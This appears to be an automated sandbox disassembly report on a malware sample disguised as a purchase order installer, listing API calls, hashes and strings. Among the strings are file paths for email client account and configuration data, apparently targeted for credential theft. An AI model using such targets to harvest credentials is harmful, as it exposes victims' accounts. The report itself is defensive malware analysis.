                                                                                                      • Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                                                                      • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                                                                      • Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                                                                      • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                                                                      APIs
                                                                                                        • Part of subcall function 37009221: _free.LIBCMT ref: 3700924A
                                                                                                      • _free.LIBCMT ref: 370092AB
                                                                                                        • Part of subcall function 3700571E: HeapFree.KERNEL32(00000000,00000000,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?), ref: 37005734
                                                                                                        • Part of subcall function 3700571E: GetLastError.KERNEL32(?,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?,?), ref: 37005746
                                                                                                      • _free.LIBCMT ref: 370092B6
                                                                                                      • _free.LIBCMT ref: 370092C1
                                                                                                      • _free.LIBCMT ref: 37009315
                                                                                                      • _free.LIBCMT ref: 37009320
                                                                                                      • _free.LIBCMT ref: 3700932B
                                                                                                      • _free.LIBCMT ref: 37009336
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                      • Instruction ID: 03b5724f2ced4f76a404c9168d9deef89e82be8d778941299b2167b9ce24c559
                                                                                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                      • Instruction Fuzzy Hash: 43118171564B08FEF620EBF0DE49FCB7B9D9F04720F400864AADD76052DA28B6145F52
                                                                                                      APIs
                                                                                                      • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                                                      • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                      • wsprintfW.USER32 ref: 00402D81
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                        • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                      • String ID: ... %d%%
                                                                                                      • API String ID: 722711167-2449383134
                                                                                                      • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                                                                      • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                                                                      • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                                                                      • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                                                                      • GetMessagePos.USER32 ref: 00404ADF
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                      • String ID: f
                                                                                                      • API String ID: 41195575-1993550816
                                                                                                      • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                      • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                                                                      • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                      • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                                                                      APIs
                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                      • wsprintfW.USER32 ref: 00402CD1
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                      • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                                                                      • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                                                                      • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                                                                      • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,37006FFD,00000000,?,?,?,37008A72,?,?,00000100), ref: 3700887B
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,37008A72,?,?,00000100,5EFC4D8B,?,?), ref: 37008901
                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 370089FB
                                                                                                      • __freea.LIBCMT ref: 37008A08
                                                                                                        • Part of subcall function 370056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37005702
                                                                                                      • __freea.LIBCMT ref: 37008A11
                                                                                                      • __freea.LIBCMT ref: 37008A36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1414292761-0
                                                                                                      • Opcode ID: d4e56e77879db31f47363741b6c0e09c2a9f94d2a7de4e799797955451a61004
                                                                                                      • Instruction ID: a13588f8e2f6555f324a09001a5d97137bd869dc1e5f443df121bf62fae199c3
                                                                                                      • Opcode Fuzzy Hash: d4e56e77879db31f47363741b6c0e09c2a9f94d2a7de4e799797955451a61004
                                                                                                      • Instruction Fuzzy Hash: DA51D4B2610216AFFB158E64CC84FBB37A9FB45770F1146A9F804D6180EB38EC50AE61
                                                                                                      APIs
                                                                                                      • _strlen.LIBCMT ref: 37001607
                                                                                                      • _strcat.LIBCMT ref: 3700161D
                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,3700190E,?,?,00000000,?,00000000), ref: 37001643
                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,3700190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 3700165A
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,3700190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 37001661
                                                                                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,3700190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 37001686
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1922816806-0
                                                                                                      • Opcode ID: c4d61c973005119257c68a60c6796dac031bf39c8df9ca7ad730cda7e86fad2a
                                                                                                      • Instruction ID: c0d4ba5057925fca6a531a6c9875865e1e141590232475a6e7915e6d4b638318
                                                                                                      • Opcode Fuzzy Hash: c4d61c973005119257c68a60c6796dac031bf39c8df9ca7ad730cda7e86fad2a
                                                                                                      • Instruction Fuzzy Hash: 9F219836900204AFE7059B54DD85FEE77B8EF89730F14405AE604FB181DB78A546CBAA
                                                                                                      APIs
                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 37001038
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 3700104B
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 37001061
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 37001075
                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 37001090
                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 370010B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 3594823470-0
                                                                                                      • Opcode ID: fc43faa5e5e0f22fd417a76eda7fc9a10019f6885068b33dbf9c3dc9f72431b3
                                                                                                      • Instruction ID: 7f060e9e42fb0e334f92dbea54be94b971c3605328fd3534567afc9ee9f808da
                                                                                                      • Opcode Fuzzy Hash: fc43faa5e5e0f22fd417a76eda7fc9a10019f6885068b33dbf9c3dc9f72431b3
                                                                                                      • Instruction Fuzzy Hash: B52191759003189BDF10DBA0DD48EDF37A8EF44234F104596E9A9E31A1DE749A86CF51
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,37003518,370023F1,37001F17), ref: 37003864
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 37003872
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 3700388B
                                                                                                      • SetLastError.KERNEL32(00000000,?,37003518,370023F1,37001F17), ref: 370038DD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852720340-0
                                                                                                      • Opcode ID: 0b56a6809b50cfad9bda37cbe368e98597c76e5cb79a23dd28c95e0f39e4c4dd
                                                                                                      • Instruction ID: 8a929ce599eadd4866dc734fe45267a652231c0594b5406017df57a0b5401add
                                                                                                      • Opcode Fuzzy Hash: 0b56a6809b50cfad9bda37cbe368e98597c76e5cb79a23dd28c95e0f39e4c4dd
                                                                                                      • Instruction Fuzzy Hash: 5F01473A608B115EF207167D6C8AA1BEBD5FB0D678B2102FEF120E40D0EF1948028F01
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,37006C6C), ref: 37005AFA
                                                                                                      • _free.LIBCMT ref: 37005B2D
                                                                                                      • _free.LIBCMT ref: 37005B55
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,37006C6C), ref: 37005B62
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,37006C6C), ref: 37005B6E
                                                                                                      • _abort.LIBCMT ref: 37005B74
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                      • String ID:
                                                                                                      • API String ID: 3160817290-0
                                                                                                      • Opcode ID: 46043ae408ab440829dbbac159f25ee6c5b263b9c170b52ce07621958756c4af
                                                                                                      • Instruction ID: ee14be931661fd348e7d54c4cae06bed34fc5212ef36406ccca9d6b378a3454d
                                                                                                      • Opcode Fuzzy Hash: 46043ae408ab440829dbbac159f25ee6c5b263b9c170b52ce07621958756c4af
                                                                                                      • Instruction Fuzzy Hash: F2F068FA544A00AEF20657F86D09F1E27EA9FC5571F2601E4F928F6180FE2CA9034D76
                                                                                                      APIs
                                                                                                        • Part of subcall function 37001E89: lstrlenW.KERNEL32(?,?,?,?,?,370010DF,?,?,?,00000000), ref: 37001E9A
                                                                                                        • Part of subcall function 37001E89: lstrcatW.KERNEL32(?,?,?,370010DF,?,?,?,00000000), ref: 37001EAC
                                                                                                        • Part of subcall function 37001E89: lstrlenW.KERNEL32(?,?,370010DF,?,?,?,00000000), ref: 37001EB3
                                                                                                        • Part of subcall function 37001E89: lstrlenW.KERNEL32(?,?,370010DF,?,?,?,00000000), ref: 37001EC8
                                                                                                        • Part of subcall function 37001E89: lstrcatW.KERNEL32(?,370010DF,?,370010DF,?,?,?,00000000), ref: 37001ED3
                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 3700122A
                                                                                                        • Part of subcall function 3700173A: _strlen.LIBCMT ref: 37001855
                                                                                                        • Part of subcall function 3700173A: _strlen.LIBCMT ref: 37001869
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                      • API String ID: 4036392271-1520055953
                                                                                                      • Opcode ID: a101c015a7e8d603ef3234be368804ce647c6b44591326a1b60d4d9a5ce637d2
                                                                                                      • Instruction ID: 4e9dc56d9be2a083a61200247676857b614fd6ce5dfbc7b07e46f6b0080350f7
                                                                                                      • Opcode Fuzzy Hash: a101c015a7e8d603ef3234be368804ce647c6b44591326a1b60d4d9a5ce637d2
                                                                                                      • Instruction Fuzzy Hash: BC219579A102486BE714D7A0DC91FED7339FF80724F100596F604EB1D0EAB55D818B5A
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                                                                      • wsprintfW.USER32 ref: 00404A70
                                                                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                      • String ID: %u.%u%s%s$&B
                                                                                                      • API String ID: 3540041739-2907463167
                                                                                                      • Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                                                                      • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                                                                      • Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                                                                      • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                                                                      APIs
                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
                                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                                                      • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
                                                                                                      • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$Next$Prev
                                                                                                      • String ID: *?|<>/":
                                                                                                      • API String ID: 589700163-165019052
                                                                                                      • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                                                                      • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                                                                      • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                                                                      • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                                                                      • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                                                                      • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                      • String ID: 8
                                                                                                      • API String ID: 1453599865-4194326291
                                                                                                      • Opcode ID: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                                                                      • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                                                                      • Opcode Fuzzy Hash: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                                                                      • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,37004AEA,?,?,37004A8A,?,37012238,0000000C,37004BBD,00000000,00000000), ref: 37004B59
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 37004B6C
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,37004AEA,?,?,37004A8A,?,37012238,0000000C,37004BBD,00000000,00000000,00000001,37002082), ref: 37004B8F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 4ea8a3d67a23f69daab24ceebb011941ad6f10a5221aff635b50de2493b313f3
                                                                                                      • Instruction ID: e054043e30d84ffb669f0f8786f7155a0f9bb083ceb7471815d15f4a82964503
                                                                                                      • Opcode Fuzzy Hash: 4ea8a3d67a23f69daab24ceebb011941ad6f10a5221aff635b50de2493b313f3
                                                                                                      • Instruction Fuzzy Hash: F1F03175940208BBEB119BA4CC09B9DBFF9EF05371F414198F909B6150DF349942CEA5
                                                                                                      APIs
                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                      • String ID:
                                                                                                      • API String ID: 1941528284-0
